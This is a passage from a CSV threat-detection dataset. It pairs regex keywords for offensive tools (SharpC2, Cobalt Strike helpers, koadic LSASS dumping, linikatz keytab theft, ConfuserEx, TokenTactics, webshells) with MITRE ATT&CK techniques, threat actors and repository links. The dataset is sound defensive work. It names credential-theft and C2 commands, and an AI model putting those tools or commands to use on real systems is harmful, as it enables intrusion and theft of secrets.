It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38701" "*Commands/StealToken.*",".{0,1000}Commands\/StealToken\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38702" "*Commands/StopDrone.*",".{0,1000}Commands\/StopDrone\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38703" "*Commands/TakeScreenshot.*",".{0,1000}Commands\/TakeScreenshot\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38704" "*Commands/WhoAmI.*",".{0,1000}Commands\/WhoAmI\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38705" "*Commands/WinRmCommand.*",".{0,1000}Commands\/WinRmCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38706" "*Commands/WmiCommand.*",".{0,1000}Commands\/WmiCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38707" "*commixproject/commix*",".{0,1000}commixproject\/commix.{0,1000}","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/commixproject/commix","1","1","N/A","N/A","N/A","10","5245","872","2025-04-13T08:55:27Z","2015-03-20T08:38:26Z","38708" "*common.ReflectiveDLL*",".{0,1000}common\.ReflectiveDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","38709" "*common_passwords.txt*",".{0,1000}common_passwords\.txt.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","38710" "*commonspeak_sublist.txt*",".{0,1000}commonspeak_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","38711" 
"*communicate_as_backdoor_user.py*",".{0,1000}communicate_as_backdoor_user\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","38712" "*comnap_##*",".{0,1000}comnap_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","38713" "*comnode_##*",".{0,1000}comnode_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","38714" "*Company'>Unam 
Sanctam*",".{0,1000}Company\'\>Unam\sSanctam\<\/Data\>.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","38722" "*compile_implant*",".{0,1000}compile_implant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38723" "*Compiling mstscax dll proxy*",".{0,1000}Compiling\smstscax\sdll\sproxy.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","38724" "*Compiling proxy argon2.dll*",".{0,1000}Compiling\sproxy\sargon2\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","38725" "*Complete log of pspy (may contain commands run in this test):*",".{0,1000}Complete\slog\sof\spspy\s\(may\scontain\scommands\srun\sin\sthis\stest\)\:.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - 
T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","38726" "*completedns-get-ns-history*",".{0,1000}completedns\-get\-ns\-history.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","38727" "*COMPlus_ETWEnabled=0\0\0\0*",".{0,1000}COMPlus_ETWEnabled\=0\\0\\0\\0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38728" "*compress_encode_obfs*",".{0,1000}compress_encode_obfs.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","38729" 
"*ComputerDefaultsUACBypass.lua*",".{0,1000}ComputerDefaultsUACBypass\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","38733" "*ComputerDirectory\*.FullDump.txt*",".{0,1000}ComputerDirectory\\.{0,1000}\.FullDump\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","38734" "*computerProps.DumpSMSAPassword*",".{0,1000}computerProps\.DumpSMSAPassword.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","38735" "*comsvcs_lsass*",".{0,1000}comsvcs_lsass.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","38743" "*ComsvcsLSASS*",".{0,1000}ComsvcsLSASS.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","38744" "*Con7ext Shell V.2*",".{0,1000}Con7ext\sShell\sV\.2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","38745" "*conda activate kraken*",".{0,1000}conda\sactivate\skraken.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","38746" "*conda create -n kraken python=*",".{0,1000}conda\screate\s\-n\skraken\spython\=.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 
","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","38747" "*config/51pwn/CVE-*",".{0,1000}config\/51pwn\/CVE\-.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","38748" "*CONFIG_NETKIT_DEBUG*",".{0,1000}CONFIG_NETKIT_DEBUG.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","38749" "*config_steal /etc/krb5.conf /etc/krb5.keytab*",".{0,1000}config_steal\s\/etc\/krb5\.conf\s\/etc\/krb5\.keytab.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","38750" "*ConfigIni::GetInt(""""Server"""", """"SOCK5Port"""", 9090""*",".{0,1000}ConfigIni\:\:GetInt\(\""Server\"",\s\""SOCK5Port\"",\s9090\"".{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","38751" "*Confuser.CLI.Exe*",".{0,1000}Confuser\.CLI\.Exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","38752" "*Confuser.CLI.exe*",".{0,1000}Confuser\.CLI\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38753" "*Confuser.DynCipher.dll*",".{0,1000}Confuser\.DynCipher\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38754" "*Confuser.Renamer.dll*",".{0,1000}Confuser\.Renamer\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38755" "*ConfuserEx (CLI)*",".{0,1000}ConfuserEx\s\(CLI\).{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38756" "*ConfuserEx Command-line*",".{0,1000}ConfuserEx\sCommand\-line.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38757" "*ConfuserEx Core*",".{0,1000}ConfuserEx\sCore.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38758" "*ConfuserEx Dynamic Cipher Library*",".{0,1000}ConfuserEx\sDynamic\sCipher\sLibrary.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38759" "*ConfuserEx Protections*",".{0,1000}ConfuserEx\sProtections.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38760" "*ConfuserEx Renamer*",".{0,1000}ConfuserEx\sRenamer.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38761" "*ConfuserEx Runtime*",".{0,1000}ConfuserEx\sRuntime.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38762" "*ConfuserEx.CLI: *",".{0,1000}ConfuserEx\.CLI\:\s.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","38763" "*Connect back to an * listener and relay the SOCKS5 traffic*",".{0,1000}Connect\sback\sto\san\s.{0,1000}\slistener\sand\srelay\sthe\sSOCKS5\straffic.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#content","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","38765" "*connect.nachovpn.local*",".{0,1000}connect\.nachovpn\.local.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN server","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","38766" "*Connect-AzureAD -AadAccessToken -AccountId 
*",".{0,1000}Connect\-AzureAD\s\-AadAccessToken\s\-AccountId\s.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","38767" "*connormcgarr/tgtdelegation*",".{0,1000}connormcgarr\/tgtdelegation.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 